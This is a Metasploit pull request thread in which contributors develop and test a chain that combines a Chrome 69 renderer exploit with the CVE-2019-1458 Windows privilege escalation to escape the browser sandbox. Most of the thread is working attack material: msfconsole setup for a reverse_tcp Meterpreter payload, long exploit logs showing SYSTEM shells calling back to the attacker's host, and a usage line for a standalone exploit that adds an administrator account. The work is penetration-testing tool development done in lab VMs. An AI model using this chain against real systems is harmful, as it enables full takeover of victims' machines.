CVE-2019-1458 chrome sandbox escape
rapid7/metasploit-framework pull request #13817
Opened 2020-07-07 10:29 UTC by timwr

This pull request demonstrates how https://github.com/rapid7/metasploit-framework/issues/13221 (aka WizardOpium?)
can be combined with any chrome exploit (in this case https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/chrome_object_create.rb) in order to escape the sandbox.

## Verification

Install Google Chrome 69.0.3497.92 on Windows 7 SP1

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_object_create`
- [ ] `set URIPATH /`
- [ ] `set payload windows/x64/meterpreter/reverse_tcp`
- [ ] `set LHOST 192.168.56.1`
- [ ] `set SRVHOST 192.168.56.1`
- [ ] `set DEBUG_EXPLOIT true`
- [ ] `run`
- [ ] Visit the URL with Chrome
- [ ] **Verify** you get a meterpreter shell as `SYSTEM`

e.g:
```
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.6     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 192.168.56.6     chrome_object_create - [*] Properties p6 and p27 overlap after conversion to dictionary mode
[*] 192.168.56.6     chrome_object_create - [*] ArrayBuffer @ 0x7aed4e9ef20
[*] 192.168.56.6     chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 192.168.56.6     chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 192.168.56.6     chrome_object_create - [*] payload addr: 0x7e86fc1c000
[*] 192.168.56.6     chrome_object_create - [*] wasm_addr @ 0x78ab777cd98
[*] 192.168.56.6     chrome_object_create - [*] wasm_rwx @ 0x4fb2c1b0000
[*] 192.168.56.6     chrome_object_create - [*] div_addr @ 0xefd1c7da00
[*] 192.168.56.6     chrome_object_create - [*] el_addr @ 0x7b9545631f8
[*] 192.168.56.6     chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:49159) at 2020-07-07 18:25:56 +0800

msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49166 (192.168.56.6)

msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.92
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

2020-07-07 10:34 UTC, timwr commented on external/source/exploits/CVE-2019-1458/dllmain.cpp
> +	char payload[4105] = "PAYLOAD:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
I couldn't find a way to pass an argument (containing the payload) to the reflective loader, so I had to fall back to the old method (for the sandbox escape, but not for the standalone module).

2020-07-07 10:36 UTC, timwr commented on modules/exploits/multi/browser/chrome_object_create.rb
> +    File.join(Msf::Config.data_directory, "exploits", "CVE-2019-1458", "exploit.dll")
I should probably add the sandbox escape as a target, so we can still use `--no-sandbox` payloads as target 0, and the sandbox escape (windows 7 only) as target 1.

2020-07-07 10:36 UTC, timwr commented on modules/exploits/windows/local/ntusermessagecall.rb
> +            CVE-2019-1458
I will fill this in once the code stops evolving.

2020-07-07 10:52 UTC, bcoles commented on modules/exploits/multi/browser/chrome_object_create.rb
> +    File.join(Msf::Config.data_directory, "exploits", "CVE-2019-1458", "exploit.dll")
Some guy called timwr added a helper function for this.

```suggestion
    exploit_data('CVE-2019-1458', 'exploit.dll')
```

2020-07-07 10:52 UTC, bcoles commented on modules/exploits/multi/browser/chrome_object_create.rb
> +      loader_data = stage_payload()
```suggestion
      loader_data = stage_payload
```

2020-07-07 10:52 UTC, bcoles commented on modules/exploits/multi/browser/chrome_object_create.rb
> +    req.overrideMimeType('text\/plain; charset=x-user-defined');
Escaping seems unnecessary.

```suggestion
    req.overrideMimeType('text/plain; charset=x-user-defined');
```

2020-07-07 10:52 UTC, bcoles commented on modules/exploits/multi/browser/chrome_object_create.rb
> +let shellcode = new Uint8Array([#{Rex::Text::to_num(shellcode)}]);
Does this work? A quick look at the source shows `shellcode` won't be defined as a Ruby variable here. `shellcode` is a JavaScript variable and won't be accessible within the Ruby string interpolation.

2020-07-08 08:34 UTC, timwr commented on modules/exploits/multi/browser/chrome_object_create.rb
> +    File.join(Msf::Config.data_directory, "exploits", "CVE-2019-1458", "exploit.dll")
library_path should be a path name, not raw binary data.

2020-07-10 09:15 UTC, timwr commented
This is ready now, apologies for the delay

2020-07-10 11:03 UTC, bcoles commented
This did not work for me on Windows 7 SP1 (x64).

```
msf5 exploit(multi/browser/chrome_object_create) > set target 1
target => 1
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/D8go4VCD7i9I
[*] Local IP: http://172.16.191.165:8080/D8go4VCD7i9I
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I/payload to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 172.16.191.130   chrome_object_create - Sent stage2 exploit (20000 bytes)
```

However, when I downgraded Chrome to version 69 on my test host, it looks like this, which probably doesn't bode well for any of my tests.

![vaporwave](https://user-images.githubusercontent.com/434827/87147355-d71a0380-c2ef-11ea-8c10-1ade2e521f2d.png)

I downloaded old versions from here:

* https://www.slimjet.com/chrome/google-chrome-old-version.php

The installers *appear* to be signed by Google.

2020-07-10 11:21 UTC, bcoles commented
I was still able to get a session using the `--no-sandbox` technique. However the `ntusermessagecall` module failed to privesc.

```
msf5 exploit(multi/browser/chrome_object_create) > set target 0
target => 0
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/HKXQRg
[*] Local IP: http://172.16.191.165:8080/HKXQRg
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /HKXQRg to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.130:49843) at 2020-07-10 07:17:27 -0400

msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 8056 launched.
[*] Injecting exploit into 8056 ...
[*] Exploit injected. Injecting payload into 8056...
[*] Payload injected. Executing exploit...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information       Connection
  --  ----  ----                     -----------       ----------
  1         meterpreter x64/windows  TEST\user @ TEST  172.16.191.165:4444 -> 172.16.191.130:49843 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > 
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: TEST\user
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

2020-07-10 11:26 UTC, bcoles commented
Another test with `--no-sandbox` , showing a non-admin user that can't privesc with `getsystem`, successfully elevating

```
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/L9NqitS20WX
[*] Local IP: http://172.16.191.165:8080/L9NqitS20WX
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /L9NqitS20WX to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.130:50067) at 2020-07-10 07:23:46 -0400

msf5 exploit(multi/browser/chrome_object_create) > use exploit/windows/local/ntusermessagecall 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 2
session => 2
msf5 exploit(windows/local/ntusermessagecall) > options

Module options (exploit/windows/local/ntusermessagecall):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PROCESS  notepad.exe      yes       Name of process to spawn and inject dll into.
   SESSION  2                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.191.165   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > run 

[-] Handler failed to bind to 172.16.191.165:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 4060 launched.
[*] Injecting exploit into 4060 ...
[*] Exploit injected. Injecting payload into 4060...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.130:50076) at 2020-07-10 07:24:02 -0400
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  2         meterpreter x64/windows  TEST\asdf @ TEST            172.16.191.165:4444 -> 172.16.191.130:50067 (172.16.191.130)
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST  172.16.191.165:4444 -> 172.16.191.130:50076 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 3 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > 
```

2020-07-10 11:33 UTC, bcoles commented
Also `Sent stage2 exploit (20000 bytes)` is a lie. It should be `0x20000` (or not printed in hex), as per:

```ruby
        loader_data = loader_data + "\0" * (0x20000 - loader_data.length)
        send_response(cli, loader_data, {'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
        print_good("Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)")
```

ie:

```ruby
        print_good("Sent stage2 exploit (#{loader_data.length} bytes)")
```

2020-07-10 12:10 UTC, bcoles commented
If at first you don't succeed, retry until you blue screen.

![image](https://user-images.githubusercontent.com/434827/87152999-0fbeda80-c2fa-11ea-84ca-5c6b77c6db6c.png)

![image](https://user-images.githubusercontent.com/434827/87152993-0d5c8080-c2fa-11ea-922f-9e738b98eeed.png)

2020-07-11 18:58 UTC, timwr commented
1) `Windows NT 6.1; WOW64` is the 32bit version of chrome, you can grab the 64bit here: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
2) The bug is due to uninitialized memory, so you only get one chance to exploit it and subsequent attempts will fail. It's 100% reliable for me on Windows 7 SP1, but the box crashes after I exit the session and I'm not sure how to fix that.

2020-07-11 19:03 UTC, bcoles commented
>     1. dows NT 6.1; WOW

I pasted the wrong log in the first comment. I realized the first test was on x86 and changed over to x64. Everything above was performed on x64.

2020-07-11 19:37 UTC, bcoles commented
>  It's 100% reliable for me on Windows 7 SP1

I tried a few times, rebooting between each attempt, with no luck on Windows 7 SP1. But given that my Chrome looks like it is screaming in pain before exploitation, that doesn't mean much.

The ntusermessagecall module works well. FWIW; I was able to exploit with it even after a failed exploitation attempt via Chrome, indicating that Chrome is not attempting exploitation, given that it's exploitable only once.

2020-07-15 09:05 UTC, xaitax commented
Was able to confirm the latest pull request on Win7x64 with Chrome 69.0.3497.100 (64bit) and PrivEsc works fine.

Furthermore tried it on Win8.1 x64 but didn't succeed.

2020-08-25 03:09 UTC, timwr commented on external/source/exploits/CVE-2019-1458/dllmain.cpp
> +	char payload[4105] = "PAYLOAD:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
Unfortunately it's still required for the sandbox escape. In the local exploit we can inject the payload into the process memory:
https://github.com/rapid7/metasploit-framework/pull/13817/files#diff-9fe6c7df53f3453217fcff2b8d27b29aR125
In the chrome exploit there isn't an easy way to do this so the `PAYLOAD:` string is replaced: https://github.com/rapid7/metasploit-framework/pull/13817/files#diff-591453026163506af84eb6534ccb31b1R82

2020-08-25 12:56 UTC, smcintyre-r7 commented on external/source/exploits/CVE-2019-1458/dllmain.cpp
> +	char payload[4105] = "PAYLOAD:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
Gotcha, thanks for clarifying.

2020-08-25 12:57 UTC, smcintyre-r7 submitted a review, later dismissed

2020-08-26 04:29 UTC, timwr commented
@xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

2020-08-28 20:20 UTC, gwillcox-r7 commented
> 1. `Windows NT 6.1; WOW64` is the 32bit version of chrome, you can grab the 64bit here: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
> 2. The bug is due to uninitialized memory, so you only get one chance to exploit it and subsequent attempts will fail. It's 100% reliable for me on Windows 7 SP1, but the box crashes after I exit the session and I'm not sure how to fix that.

@timwr Hmm so I tried this multiple times, however I can't seem to get it to work with sandbox. Used the file from https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.92-20074/download/ and this was the results:


```
msf5 > use exploit/multi/browser/chrome_object_create
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > set LHOST 169.254.115.5
LHOST => 169.254.115.5
msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 169.254.115.5
SRVHOST => 169.254.115.5
msf5 exploit(multi/browser/chrome_object_create) > set DEBUG_EXPLOIT true
DEBUG_EXPLOIT => true.
msf5 exploit(multi/browser/chrome_object_create) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:8080/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p15 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x42ad9a40f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x5415faf2f18
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x2e4ad680000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x5906c359750
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x5d0658a31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p6 and p29 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x5095cb240f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x57358c373a8
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x479c1ff0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x21d42aedec0
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x1fe635831f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p6 and p10 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x54dfae241a8
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x7d286a38188
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x18c29860000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x359f54e5a18
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x468f94231f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p6 and p26 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x2aa8bd84368
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x457a341ddd8
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x277c5700000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x122bfa4e4b0
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x2eee02231f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p12 and p22 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x75c299a41a8
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x3eabf5a0df8
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x5e181f60000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x68552465c98
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x3b2acb231f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p13 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x540d8d241a8
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x201838a2718
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x4c011c90000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x6db1e268f70
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x48ed9b631f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...

*** At this point I used the --no-sandbox flag to see if it was a sandbox issue ***

[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p4 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x6e290aa41a8
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x7a6f6afcd58
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0xfb60ca0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x484f3b751c8
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x4600cb831f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 1 opened (169.254.115.5:4444 -> 169.254.133.29:49169) at 2020-08-28 15:15:30 -0500

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter >
```

So basically it seems the vulnerability is not working in the sandbox right now, and its also not getting the SYSTEM permissions.

2020-08-28 20:26 UTC, gwillcox-r7 commented
@timwr Not sure this is working at the moment, tried this two times with the sandbox enabled and this is basically what I got:

```
msf5 exploit(multi/browser/chrome_object_create) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:8080/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p12 and p21 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x330bc7a40f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x27624222718
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x24616300000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x6109c9e8f70
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6eb3a9831f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
```
Then the Chrome tab crashed on the other side. Using https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.92-20074/download/ as the download source and running it on a Windows 7 x64 SP1 machine with no updates.

Here is the result if I try it with no sandbox:


```
msf5 exploit(multi/browser/chrome_object_create) >
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p16 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x79edd2240f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x6e6fe27b528
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x5520c4b0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x2bb8e87cb60
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6ba3fcc31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 2 opened (169.254.115.5:4444 -> 169.254.133.29:49159) at 2020-08-28 15:25:16 -0500

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: test-PC\test
meterpreter >
```

2020-08-28 20:36 UTC, gwillcox-r7 commented
> @xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Taking a look at this now, will let you know what the results are.

2020-08-28 21:16 UTC, gwillcox-r7 commented
> @xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Results:

```
C:\Users\low\Desktop>cve-2019-1458.exe
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
Usage: cve-2019-1458.exe command
Example: cve-2019-1458.exe "net user admin admin /ad & net user localgroup admin
istrators admin /ad"

WARNING: YOU ONLY HAVE ONE CHANCE!!!
C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user

User accounts for \\TEST

-------------------------------------------------------------------------------
Administrator            Guest                    low
user
The command completed successfully.


C:\Users\low\Desktop>net user /?
The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]


C:\Users\low\Desktop>net user /ad
The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]


C:\Users\low\Desktop>net user /add
The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]


C:\Users\low\Desktop>net user admin admin /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user admin admin /foobar
The option /FOOBAR is unknown.

The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]

More help is available by typing NET HELPMSG 3506.


C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user admin admin /a
Option /A is ambiguous.

The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]

More help is available by typing NET HELPMSG 3507.


C:\Users\low\Desktop>net user admin admin /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user localgroup administrators
The user name could not be found.

More help is available by typing NET HELPMSG 2221.


C:\Users\low\Desktop>net user localgroup
The user name could not be found.

More help is available by typing NET HELPMSG 2221.


C:\Users\low\Desktop>net user /?
The syntax of this command is:

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
         username [/TIMES:{times | ALL}]
         username [/ACTIVE: {YES | NO}]


C:\Users\low\Desktop>net user localgroup
The user name could not be found.

More help is available by typing NET HELPMSG 2221.


C:\Users\low\Desktop>net group localgroup
This command can be used only on a Windows Domain Controller.

More help is available by typing NET HELPMSG 3515.


C:\Users\low\Desktop>net ?
The syntax of this command is:

NET
    [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
      HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
      STATISTICS | STOP | TIME | USE | USER | VIEW ]

C:\Users\low\Desktop>net localgroup

Aliases for \\TEST

-------------------------------------------------------------------------------
*Administrators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Performance Log Users
*Performance Monitor Users
*Remote Management Users
*Users
*WinRMRemoteWMIUsers__
The command completed successfully.


C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
user
The command completed successfully.


